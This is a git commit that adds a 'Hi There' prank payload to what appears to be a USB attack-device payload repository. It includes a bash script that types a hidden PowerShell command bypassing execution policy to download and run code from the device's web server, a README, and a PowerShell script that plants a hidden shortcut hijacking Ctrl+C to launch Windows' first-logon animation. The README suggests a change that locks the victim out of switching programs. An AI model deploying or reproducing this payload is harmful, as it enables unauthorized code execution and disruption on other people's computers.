New Payload - Hi There (#496)

pull/499/head
cribb-it 2022-02-27 18:31:27 +00:00 committed by GitHub
parent b86412afbd
commit a0ee4512b3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 89 additions and 0 deletions

View File

@ -0,0 +1,37 @@
#!/bin/bash
# Title: Hi There
# Description: Creates a hidden link file that override the ctrl+c functionality.
# So, where the use press ctrl+c it lunches the first sign-in animation.
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
# Props: v3ded, Hexacorn and Audibleblink (Python Server)
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
QUACK DELAY 500
QUACK CTRL c
LED FINISH

View File

@ -0,0 +1,33 @@
# Hi There
- Author: Cribbit
- Version: 1.0
- Tested on: Windows 10 (Powershell 5.1+)
- Category: Pranks
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
- Props: v3ded, Hexacorn and Audibleblink (Python Server)
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Creates a hidden link file that override the ctrl+c functionality.
So, where the use press ctrl+c it lunches the first sign-in animation.
## Notes
to kill the animation, you need to open task manger and look for "First Sign-in Animation".
For extra evilness add `/explorer` to the `$shortcut.Arguments` line in the script file. Then you can't switch programs or kill it.
## More information
<https://v3ded.github.io/redteam/abusing-lnk-features-for-initial-access-and-persistence>
<https://www.hexacorn.com/blog/2022/01/16/windows-installation-animation/>
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |

View File

@ -0,0 +1,19 @@
$path = "$([Environment]::GetFolderPath('Desktop'))\readme.lnk"
$wshell = New-Object -ComObject Wscript.Shell
$shortcut = $wshell.CreateShortcut($path)
$shortcut.IconLocation = "C:\Windows\System32\shell32.dll,70"
$shortcut.TargetPath = "C:\Windows\System32\oobe\FirstLogonAnim.exe"
$shortcut.Arguments = "/RunFirstLogonAnim"
$shortcut.WorkingDirectory = "C:"
$shortcut.HotKey = "CTRL+C"
$shortcut.Description = "Contain very important information"
$shortcut.WindowStyle = 7
# 7 = Minimized window
# 3 = Maximized window
# 1 = Normal window
$shortcut.Save()
(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks)